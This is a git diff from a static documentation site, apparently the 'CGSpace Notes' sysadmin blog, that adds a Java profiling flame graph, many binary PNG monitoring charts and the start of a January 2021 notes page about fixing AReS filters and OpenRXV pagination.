+<title>strncpy (4 samples, 0.32%)</title><rect x="106.5" y="357" width="3.7" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="109.46" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/proxy/pojo/javassist/JavassistLazyInitializer:::invoke (1 samples, 0.08%)</title><rect x="515.7" y="389" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="518.71" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/ImmutableHttpProcessor:::process (1 samples, 0.08%)</title><rect x="818.2" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="821.21" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.08%)</title><rect x="784.5" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="787.49" y="431.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.08%)</title><rect x="294.7" y="373" width="0.9" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="297.70" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/collection/AbstractCollectionPersister:::readIndex (1 samples, 0.08%)</title><rect x="782.6" y="373" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="785.62" y="383.5" ></text>
+</g>
+<g >
+<title>itable stub (27 samples, 2.14%)</title><rect x="385.5" y="421" width="25.3" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="388.54" y="431.5" >i..</text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::listeners (1 samples, 0.08%)</title><rect x="995.2" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="998.21" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::getOrphans (9 samples, 0.71%)</title><rect x="1112.3" y="389" width="8.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1115.27" y="399.5" ></text>
+</g>
+<g >
+<title>__libc_recv (24 samples, 1.90%)</title><rect x="60.6" y="869" width="22.4" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="63.57" y="879.5" >_..</text>
+</g>
+<g >
+<title>org/apache/http/protocol/RequestContent:::process (1 samples, 0.08%)</title><rect x="818.2" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="821.21" y="399.5" ></text>
+</g>
+<g >
+<title>update_wall_time (1 samples, 0.08%)</title><rect x="990.5" y="229" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="993.52" y="239.5" ></text>
+</g>
+<g >
+<title>psi_task_change (1 samples, 0.08%)</title><rect x="63.4" y="645" width="0.9" height="15.0" fill="rgb(238,105,105)" rx="2" ry="2" />
+<text  x="66.38" y="655.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/HierarchicalConfiguration:::getProperty (4 samples, 0.32%)</title><rect x="845.4" y="469" width="3.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="848.37" y="479.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration:::getProperty (1 samples, 0.08%)</title><rect x="1135.7" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1138.68" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/ClientParamsStack:::getParameter (1 samples, 0.08%)</title><rect x="1157.2" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1160.22" y="431.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (5 samples, 0.40%)</title><rect x="648.7" y="421" width="4.7" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="651.70" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/HierarchicalConfiguration:::getProperty (20 samples, 1.59%)</title><rect x="849.1" y="485" width="18.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="852.11" y="495.5" ></text>
+</g>
+<g >
+<title>itable stub (5 samples, 0.40%)</title><rect x="664.6" y="469" width="4.7" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="667.62" y="479.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/AppenderSkeleton:::doAppend (2 samples, 0.16%)</title><rect x="791.0" y="357" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="794.05" y="367.5" ></text>
+</g>
+<g >
+<title>__sched_text_start (20 samples, 1.59%)</title><rect x="63.4" y="677" width="18.7" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="66.38" y="687.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="817.3" y="149" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="820.27" y="159.5" ></text>
+</g>
+<g >
+<title>java/nio/charset/CharsetEncoder:::encode (3 samples, 0.24%)</title><rect x="794.8" y="277" width="2.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="797.79" y="287.5" ></text>
+</g>
+<g >
+<title>tick_sched_handle (1 samples, 0.08%)</title><rect x="158.0" y="325" width="0.9" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="160.97" y="335.5" ></text>
+</g>
+<g >
+<title>JNU_NewObjectByName (1 samples, 0.08%)</title><rect x="789.2" y="341" width="0.9" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="792.17" y="351.5" ></text>
+</g>
+<g >
+<title>update_dl_rq_load_avg (1 samples, 0.08%)</title><rect x="80.2" y="549" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="83.24" y="559.5" ></text>
+</g>
+<g >
+<title>__softirqentry_text_start (2 samples, 0.16%)</title><rect x="1117.9" y="325" width="1.9" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1120.89" y="335.5" ></text>
+</g>
+<g >
+<title>__wake_up_sync_key (1 samples, 0.08%)</title><rect x="98.0" y="277" width="1.0" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="101.03" y="287.5" ></text>
+</g>
+<g >
+<title>__hrtimer_run_queues (1 samples, 0.08%)</title><rect x="223.5" y="341" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="226.52" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushCollections (5 samples, 0.40%)</title><rect x="121.4" y="437" width="4.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="124.44" y="447.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor17:::invoke (1 samples, 0.08%)</title><rect x="756.4" y="501" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="759.40" y="511.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::request (16 samples, 1.27%)</title><rect x="804.2" y="485" width="14.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="807.16" y="495.5" ></text>
+</g>
+<g >
+<title>futex_wait_queue_me (50 samples, 3.97%)</title><rect x="13.7" y="757" width="46.9" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="16.75" y="767.5" >fute..</text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentList:::toArray (7 samples, 0.56%)</title><rect x="312.5" y="501" width="6.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="315.49" y="511.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (26 samples, 2.06%)</title><rect x="1165.7" y="837" width="24.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1168.65" y="847.5" >[..</text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.08%)</title><rect x="990.5" y="325" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="993.52" y="335.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::loadCollection (10 samples, 0.79%)</title><rect x="767.6" y="485" width="9.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="770.63" y="495.5" ></text>
+</g>
+<g >
+<title>_new_array_Java (1 samples, 0.08%)</title><rect x="969.0" y="389" width="0.9" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="971.98" y="399.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.08%)</title><rect x="87.7" y="677" width="1.0" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="90.73" y="687.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/WrapVisitor:::processValue (7 samples, 0.56%)</title><rect x="944.6" y="389" width="6.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="947.63" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/sql/IntegerTypeDescriptor$2:::doExtract (1 samples, 0.08%)</title><rect x="772.3" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="775.32" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractSessionOutputBuffer:::flush (1 samples, 0.08%)</title><rect x="1149.7" y="277" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1152.73" y="287.5" ></text>
+</g>
+<g >
+<title>start_thread (1,144 samples, 90.79%)</title><rect x="118.6" y="869" width="1071.4" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="121.63" y="879.5" >start_thread</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="789.2" y="309" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="792.17" y="319.5" ></text>
+</g>
+<g >
+<title>iptable_mangle_hook (1 samples, 0.08%)</title><rect x="100.8" y="373" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="103.84" y="383.5" ></text>
+</g>
+<g >
+<title>schedule (1 samples, 0.08%)</title><rect x="518.5" y="357" width="1.0" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="521.52" y="367.5" ></text>
+</g>
+<g >
+<title>swapgs_restore_regs_and_return_to_usermode (1 samples, 0.08%)</title><rect x="553.2" y="437" width="0.9" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="556.17" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (2 samples, 0.16%)</title><rect x="791.0" y="373" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="794.05" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::append (2 samples, 0.16%)</title><rect x="791.0" y="341" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="794.05" y="351.5" ></text>
+</g>
+<g >
+<title>do_IRQ (1 samples, 0.08%)</title><rect x="1124.4" y="389" width="1.0" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1127.44" y="399.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/bitstore/DSBitStoreService:::get (4 samples, 0.32%)</title><rect x="789.2" y="421" width="3.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="792.17" y="431.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/config/DSpaceConfigurationService:::convert (1 samples, 0.08%)</title><rect x="1140.4" y="485" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1143.37" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (207 samples, 16.43%)</title><rect x="118.6" y="485" width="193.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="121.63" y="495.5" >org/hibernate/context/int..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1150.7" y="165" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1153.67" y="175.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::isEntityType (1 samples, 0.08%)</title><rect x="527.9" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="530.89" y="431.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::fillInStackTrace (1 samples, 0.08%)</title><rect x="797.6" y="165" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="800.60" y="175.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor27:::invoke (1 samples, 0.08%)</title><rect x="777.0" y="357" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="780.00" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (2 samples, 0.16%)</title><rect x="1161.0" y="437" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1163.97" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::isDirty (1 samples, 0.08%)</title><rect x="670.2" y="469" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="673.24" y="479.5" ></text>
+</g>
+</g>
+</svg>
diff --git a/docs/2020/03/cgspace-cpu-year.png b/docs/2020/03/cgspace-cpu-year.png
new file mode 100644
index 000000000..ea0b09c77
Binary files /dev/null and b/docs/2020/03/cgspace-cpu-year.png differ
diff --git a/docs/2020/03/cgspace-heap-year.png b/docs/2020/03/cgspace-heap-year.png
new file mode 100644
index 000000000..298984c7a
Binary files /dev/null and b/docs/2020/03/cgspace-heap-year.png differ
diff --git a/docs/2020/03/cgspace-memory-year.png b/docs/2020/03/cgspace-memory-year.png
new file mode 100644
index 000000000..f71ddce2f
Binary files /dev/null and b/docs/2020/03/cgspace-memory-year.png differ
diff --git a/docs/2020/04/jmx_tomcat_dbpools-day.png b/docs/2020/04/jmx_tomcat_dbpools-day.png
new file mode 100644
index 000000000..f6f984356
Binary files /dev/null and b/docs/2020/04/jmx_tomcat_dbpools-day.png differ
diff --git a/docs/2020/04/jmx_tomcat_dbpools-month.png b/docs/2020/04/jmx_tomcat_dbpools-month.png
new file mode 100644
index 000000000..6b1d8005b
Binary files /dev/null and b/docs/2020/04/jmx_tomcat_dbpools-month.png differ
diff --git a/docs/2020/04/postgres_connections_cgspace-day.png b/docs/2020/04/postgres_connections_cgspace-day.png
new file mode 100644
index 000000000..1106502cf
Binary files /dev/null and b/docs/2020/04/postgres_connections_cgspace-day.png differ
diff --git a/docs/2020/04/postgres_connections_cgspace-week.png b/docs/2020/04/postgres_connections_cgspace-week.png
new file mode 100644
index 000000000..4290c1d54
Binary files /dev/null and b/docs/2020/04/postgres_connections_cgspace-week.png differ
diff --git a/docs/2020/05/postgres_connections_cgspace-week.png b/docs/2020/05/postgres_connections_cgspace-week.png
new file mode 100644
index 000000000..8f847ed11
Binary files /dev/null and b/docs/2020/05/postgres_connections_cgspace-week.png differ
diff --git a/docs/2020/05/postgres_connections_cgspace-week2.png b/docs/2020/05/postgres_connections_cgspace-week2.png
new file mode 100644
index 000000000..a9b2abd46
Binary files /dev/null and b/docs/2020/05/postgres_connections_cgspace-week2.png differ
diff --git a/docs/2020/06/cgspace-discovery-search.png b/docs/2020/06/cgspace-discovery-search.png
new file mode 100644
index 000000000..0e2f0a7ad
Binary files /dev/null and b/docs/2020/06/cgspace-discovery-search.png differ
diff --git a/docs/2020/06/item-authorizations-dspace58.png b/docs/2020/06/item-authorizations-dspace58.png
new file mode 100644
index 000000000..3f92b8018
Binary files /dev/null and b/docs/2020/06/item-authorizations-dspace58.png differ
diff --git a/docs/2020/06/item-authorizations-dspace63.png b/docs/2020/06/item-authorizations-dspace63.png
new file mode 100644
index 000000000..f02697b66
Binary files /dev/null and b/docs/2020/06/item-authorizations-dspace63.png differ
diff --git a/docs/2020/06/localhost-discovery-search.png b/docs/2020/06/localhost-discovery-search.png
new file mode 100644
index 000000000..2acfc2fda
Binary files /dev/null and b/docs/2020/06/localhost-discovery-search.png differ
diff --git a/docs/2020/06/postgres_connections_ALL-day2.png b/docs/2020/06/postgres_connections_ALL-day2.png
new file mode 100644
index 000000000..7ecf16653
Binary files /dev/null and b/docs/2020/06/postgres_connections_ALL-day2.png differ
diff --git a/docs/2020/06/postgres_connections_ALL-day3.png b/docs/2020/06/postgres_connections_ALL-day3.png
new file mode 100644
index 000000000..aa4e721b5
Binary files /dev/null and b/docs/2020/06/postgres_connections_ALL-day3.png differ
diff --git a/docs/2020/06/postgres_connections_ALL-week2.png b/docs/2020/06/postgres_connections_ALL-week2.png
new file mode 100644
index 000000000..a88f81dba
Binary files /dev/null and b/docs/2020/06/postgres_connections_ALL-week2.png differ
diff --git a/docs/2020/06/postgres_connections_ALL-week3.png b/docs/2020/06/postgres_connections_ALL-week3.png
new file mode 100644
index 000000000..f2f2d9829
Binary files /dev/null and b/docs/2020/06/postgres_connections_ALL-week3.png differ
diff --git a/docs/2020/06/postgres_connections_ALL-year-dspacetest.png b/docs/2020/06/postgres_connections_ALL-year-dspacetest.png
new file mode 100644
index 000000000..4e454a575
Binary files /dev/null and b/docs/2020/06/postgres_connections_ALL-year-dspacetest.png differ
diff --git a/docs/2020/06/postgres_connections_ALL-year.png b/docs/2020/06/postgres_connections_ALL-year.png
new file mode 100644
index 000000000..c1ca7574e
Binary files /dev/null and b/docs/2020/06/postgres_connections_ALL-year.png differ
diff --git a/docs/2020/06/postgres_locks_ALL-week.png b/docs/2020/06/postgres_locks_ALL-week.png
new file mode 100644
index 000000000..7237a1ee6
Binary files /dev/null and b/docs/2020/06/postgres_locks_ALL-week.png differ
diff --git a/docs/2020/06/postgres_locks_ALL-year.png b/docs/2020/06/postgres_locks_ALL-year.png
new file mode 100644
index 000000000..4323ae0d1
Binary files /dev/null and b/docs/2020/06/postgres_locks_ALL-year.png differ
diff --git a/docs/2020/07/altmetrics-dimensions-badges.png b/docs/2020/07/altmetrics-dimensions-badges.png
new file mode 100644
index 000000000..0420689c3
Binary files /dev/null and b/docs/2020/07/altmetrics-dimensions-badges.png differ
diff --git a/docs/2020/07/cua-font-awesome.png b/docs/2020/07/cua-font-awesome.png
new file mode 100644
index 000000000..c3eaf3d82
Binary files /dev/null and b/docs/2020/07/cua-font-awesome.png differ
diff --git a/docs/2020/07/dimensions-badge.png b/docs/2020/07/dimensions-badge.png
new file mode 100644
index 000000000..cd3bcf73e
Binary files /dev/null and b/docs/2020/07/dimensions-badge.png differ
diff --git a/docs/2020/07/dimensions-badge2.png b/docs/2020/07/dimensions-badge2.png
new file mode 100644
index 000000000..84762343b
Binary files /dev/null and b/docs/2020/07/dimensions-badge2.png differ
diff --git a/docs/2020/07/jmx_dspace_sessions-day.png b/docs/2020/07/jmx_dspace_sessions-day.png
new file mode 100644
index 000000000..9218a154e
Binary files /dev/null and b/docs/2020/07/jmx_dspace_sessions-day.png differ
diff --git a/docs/2020/07/postgres_locks_ALL-day.png b/docs/2020/07/postgres_locks_ALL-day.png
new file mode 100644
index 000000000..b2a9fe5f7
Binary files /dev/null and b/docs/2020/07/postgres_locks_ALL-day.png differ
diff --git a/docs/2020/07/postgres_transactions_ALL-day.png b/docs/2020/07/postgres_transactions_ALL-day.png
new file mode 100644
index 000000000..b20df4108
Binary files /dev/null and b/docs/2020/07/postgres_transactions_ALL-day.png differ
diff --git a/docs/2020/07/threads-day.png b/docs/2020/07/threads-day.png
new file mode 100644
index 000000000..5f2c384df
Binary files /dev/null and b/docs/2020/07/threads-day.png differ
diff --git a/docs/2020/08/postgres_locks_ALL-day.png b/docs/2020/08/postgres_locks_ALL-day.png
new file mode 100644
index 000000000..f29c8b1ee
Binary files /dev/null and b/docs/2020/08/postgres_locks_ALL-day.png differ
diff --git a/docs/2020/08/postgres_querylength_ALL-day.png b/docs/2020/08/postgres_querylength_ALL-day.png
new file mode 100644
index 000000000..2b34e7084
Binary files /dev/null and b/docs/2020/08/postgres_querylength_ALL-day.png differ
diff --git a/docs/2020/09/agrovoc-landvoc-sparql.png b/docs/2020/09/agrovoc-landvoc-sparql.png
new file mode 100644
index 000000000..c0e4d075a
Binary files /dev/null and b/docs/2020/09/agrovoc-landvoc-sparql.png differ
diff --git a/docs/2020/09/ares-share-link.png b/docs/2020/09/ares-share-link.png
new file mode 100644
index 000000000..4644f6782
Binary files /dev/null and b/docs/2020/09/ares-share-link.png differ
diff --git a/docs/2020/09/postgres_connections_ALL-day.png b/docs/2020/09/postgres_connections_ALL-day.png
new file mode 100644
index 000000000..5322da280
Binary files /dev/null and b/docs/2020/09/postgres_connections_ALL-day.png differ
diff --git a/docs/2020/09/tgn-concept-uri.png b/docs/2020/09/tgn-concept-uri.png
new file mode 100644
index 000000000..2278d6205
Binary files /dev/null and b/docs/2020/09/tgn-concept-uri.png differ
diff --git a/docs/2020/09/viaf-authority.png b/docs/2020/09/viaf-authority.png
new file mode 100644
index 000000000..9c4c61948
Binary files /dev/null and b/docs/2020/09/viaf-authority.png differ
diff --git a/docs/2020/09/viaf-darwin.png b/docs/2020/09/viaf-darwin.png
new file mode 100644
index 000000000..c7f4eb058
Binary files /dev/null and b/docs/2020/09/viaf-darwin.png differ
diff --git a/docs/2020/11/postgres_connections_ALL-week.png b/docs/2020/11/postgres_connections_ALL-week.png
new file mode 100644
index 000000000..63f90a4d8
Binary files /dev/null and b/docs/2020/11/postgres_connections_ALL-week.png differ
diff --git a/docs/2020/11/postgres_connections_ALL-week2.png b/docs/2020/11/postgres_connections_ALL-week2.png
new file mode 100644
index 000000000..7b2bf48a2
Binary files /dev/null and b/docs/2020/11/postgres_connections_ALL-week2.png differ
diff --git a/docs/2020/11/postgres_connections_ALL-week3.png b/docs/2020/11/postgres_connections_ALL-week3.png
new file mode 100644
index 000000000..021fb5592
Binary files /dev/null and b/docs/2020/11/postgres_connections_ALL-week3.png differ
diff --git a/docs/2020/11/postgres_locks_ALL-week.png b/docs/2020/11/postgres_locks_ALL-week.png
new file mode 100644
index 000000000..62edfd657
Binary files /dev/null and b/docs/2020/11/postgres_locks_ALL-week.png differ
diff --git a/docs/2020/11/postgres_locks_ALL-week2.png b/docs/2020/11/postgres_locks_ALL-week2.png
new file mode 100644
index 000000000..08aa4e503
Binary files /dev/null and b/docs/2020/11/postgres_locks_ALL-week2.png differ
diff --git a/docs/2020/11/postgres_locks_ALL-week3.png b/docs/2020/11/postgres_locks_ALL-week3.png
new file mode 100644
index 000000000..c24739065
Binary files /dev/null and b/docs/2020/11/postgres_locks_ALL-week3.png differ
diff --git a/docs/2020/11/postgres_transactions_ALL-week.png b/docs/2020/11/postgres_transactions_ALL-week.png
new file mode 100644
index 000000000..d2a5f1e56
Binary files /dev/null and b/docs/2020/11/postgres_transactions_ALL-week.png differ
diff --git a/docs/2020/11/postgres_xlog-week.png b/docs/2020/11/postgres_xlog-week.png
new file mode 100644
index 000000000..744ea0bdf
Binary files /dev/null and b/docs/2020/11/postgres_xlog-week.png differ
diff --git a/docs/2020/11/postgres_xlog-week2.png b/docs/2020/11/postgres_xlog-week2.png
new file mode 100644
index 000000000..32d444212
Binary files /dev/null and b/docs/2020/11/postgres_xlog-week2.png differ
diff --git a/docs/2020/12/openrxv-duplicates.png b/docs/2020/12/openrxv-duplicates.png
new file mode 100644
index 000000000..daa2ac160
Binary files /dev/null and b/docs/2020/12/openrxv-duplicates.png differ
diff --git a/docs/2020/12/postgres_connections_ALL-day.png b/docs/2020/12/postgres_connections_ALL-day.png
new file mode 100644
index 000000000..93b95029e
Binary files /dev/null and b/docs/2020/12/postgres_connections_ALL-day.png differ
diff --git a/docs/2020/12/postgres_connections_ALL-week.png b/docs/2020/12/postgres_connections_ALL-week.png
new file mode 100644
index 000000000..42b21e808
Binary files /dev/null and b/docs/2020/12/postgres_connections_ALL-week.png differ
diff --git a/docs/2020/12/postgres_connections_ALL-week2.png b/docs/2020/12/postgres_connections_ALL-week2.png
new file mode 100644
index 000000000..43e75793a
Binary files /dev/null and b/docs/2020/12/postgres_connections_ALL-week2.png differ
diff --git a/docs/2020/12/postgres_locks_ALL-day.png b/docs/2020/12/postgres_locks_ALL-day.png
new file mode 100644
index 000000000..3c1134031
Binary files /dev/null and b/docs/2020/12/postgres_locks_ALL-day.png differ
diff --git a/docs/2020/12/postgres_locks_ALL-week.png b/docs/2020/12/postgres_locks_ALL-week.png
new file mode 100644
index 000000000..ffbcfd2ec
Binary files /dev/null and b/docs/2020/12/postgres_locks_ALL-week.png differ
diff --git a/docs/2020/12/postgres_locks_ALL-week2.png b/docs/2020/12/postgres_locks_ALL-week2.png
new file mode 100644
index 000000000..f3e257ca0
Binary files /dev/null and b/docs/2020/12/postgres_locks_ALL-week2.png differ
diff --git a/docs/2020/12/postgres_querylength_ALL-day.png b/docs/2020/12/postgres_querylength_ALL-day.png
new file mode 100644
index 000000000..3021bbaae
Binary files /dev/null and b/docs/2020/12/postgres_querylength_ALL-day.png differ
diff --git a/docs/2020/12/postgres_transactions_ALL-day.png b/docs/2020/12/postgres_transactions_ALL-day.png
new file mode 100644
index 000000000..df1c77616
Binary files /dev/null and b/docs/2020/12/postgres_transactions_ALL-day.png differ
diff --git a/docs/2020/12/solr-statistics-2010-failed.png b/docs/2020/12/solr-statistics-2010-failed.png
new file mode 100644
index 000000000..c9454d9e3
Binary files /dev/null and b/docs/2020/12/solr-statistics-2010-failed.png differ
diff --git a/docs/2020/12/solr-stats-duplicates.png b/docs/2020/12/solr-stats-duplicates.png
new file mode 100644
index 000000000..c10d58fb7
Binary files /dev/null and b/docs/2020/12/solr-stats-duplicates.png differ
diff --git a/docs/2021-01/index.html b/docs/2021-01/index.html
new file mode 100644
index 000000000..14aeb4e88
--- /dev/null
+++ b/docs/2021-01/index.html
@@ -0,0 +1,742 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="January, 2021" />
+<meta property="og:description" content="2021-01-03
+
+Peter notified me that some filters on AReS were broken again
+
+It&rsquo;s the same issue with the field names getting .keyword appended to the end that I already filed an issue on OpenRXV about last month
+I fixed the broken filters (careful to not edit any others, lest they break too!)
+
+
+Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV
+
+The start page had been &ldquo;1&rdquo; in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API
+I adjusted it to default to 0 and added a note to the admin screen
+I realized that this issue was actually causing the first page of 100 statistics to be missing&hellip;
+For example, this item has 51 views on CGSpace, but 0 on AReS
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2021-01/" />
+<meta property="article:published_time" content="2021-01-03T10:13:54+02:00" />
+<meta property="article:modified_time" content="2021-01-31T16:32:16+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="January, 2021"/>
+<meta name="twitter:description" content="2021-01-03
+
+Peter notified me that some filters on AReS were broken again
+
+It&rsquo;s the same issue with the field names getting .keyword appended to the end that I already filed an issue on OpenRXV about last month
+I fixed the broken filters (careful to not edit any others, lest they break too!)
+
+
+Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV
+
+The start page had been &ldquo;1&rdquo; in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API
+I adjusted it to default to 0 and added a note to the admin screen
+I realized that this issue was actually causing the first page of 100 statistics to be missing&hellip;
+For example, this item has 51 views on CGSpace, but 0 on AReS
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "January, 2021",
+  "url": "https://alanorth.github.io/cgspace-notes/2021-01/",
+  "wordCount": "3157",
+  "datePublished": "2021-01-03T10:13:54+02:00",
+  "dateModified": "2021-01-31T16:32:16+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2021-01/">
+
+    <title>January, 2021 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
